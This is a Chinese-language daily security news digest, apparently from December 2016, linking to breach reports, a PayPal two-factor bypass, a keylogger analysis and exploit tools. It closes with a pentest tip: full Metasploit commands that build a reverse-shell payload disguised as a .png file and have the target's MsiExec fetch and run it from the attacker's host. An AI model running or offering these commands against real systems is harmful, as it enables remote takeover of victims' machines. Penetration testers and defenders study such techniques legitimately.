【知识】12月19日 - 每日安全知识热点

阅读量    28669 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

http://p6.qhimg.com/t017313015b51e6034e.png


热点概要:在线培训网站Lynda.com数据泄露、paypal双因子绕过漏洞细节、MiKey – 分析一款Linux下的键盘记录软件、对Naenara Browser 3.5 exploit的预览


国内热词(以下内容部分摘自http://www.cnbeta.com/):


偷换300多家商户收款二维码 两男子盗刷近百万元

网上回收摩拜单车开价2000元 ofo只卖99元

维基百科超过筹款目标 但继续要求捐钱

FBI、CIA指责俄罗斯为美国大选幕后黑手 奥巴马称将报复


资讯类:


Wikileaks公布德国NSA调查委员会的内部分类文件

http://electrospaces.blogspot.co.id/2016/12/wikileaks-publishes-classified.html


数据库泄露类:


在线培训网站Lynda.com数据被第三方非授权访问,官方重置55,000用户密码

http://www.theregister.co.uk/2016/12/18/linkedin_lynda_breach/

俄罗斯黑客销售美国选举援助委员会网站的权限和数据

https://www.recordedfuture.com/rasputin-eac-breach/

技术类:


paypal双因子绕过漏洞细节

http://tayyabqadir.com/2016/12/17/paypal-2fa-bypass-by-tayyab-qadir/

PowerShellArsenal:使用powershell编写的逆向模块,可以用来分析.NET恶意软件

https://github.com/mattifestation/PowerShellArsenal

Wifi-Dumper : 获取windows平台下wifi profiles中明文密码的工具

https://github.com/Viralmaniar/Wifi-Dumper

MiKey – 分析一款Linux下的键盘记录软件

http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger

使用Vshot 和 Remnux进行内存取证(第一部分)

https://cyber-ir.com/2016/12/14/memory-forensics-with-vshot-and-remnux-1/

自动寻找Ian Beer's exploit的offset(仅仅支持_kernproc / _allproc)

https://gist.github.com/jndok/2a01a5885552571a69341a9700ac1bb0

一道Qrilee出的Android Crackme 

https://github.com/Qrilee/crackme

Implementing & mitigating covert channels in Dropbox 

http://cygnus.tele.pw.edu.pl/~wmazurczyk/art/Dropbox-CC.pdf

给ropper增加semantic search功能

https://scoding.de/semantic-search-in-ropper

使用Mobile Partner实现本地提权

https://osandamalith.com/2014/10/20/escalating-local-privileges-using-mobile-partner/

对Naenara Browser 3.5 exploit的预览

https://www.myhackerhouse.com/naenara-browser-3-5-exploit-jackrabbit/

Pentest Tips:


在本地执行远程恶意MSI文件的方法:

1.生成payload

msfvenom -f msi -p windows/meterpreter/reverse_tcp LHOST=10.18.180.148 LPORT=4444 > meterp.png

2.在攻击者的机器上监听端口,等待肉鸡上线

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.18.180.148
set ExitOnSession false
exploit -j -z

3.肉鸡上执行

MsiExec /i http://10.18.180.148:88/meterp.png /q
分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多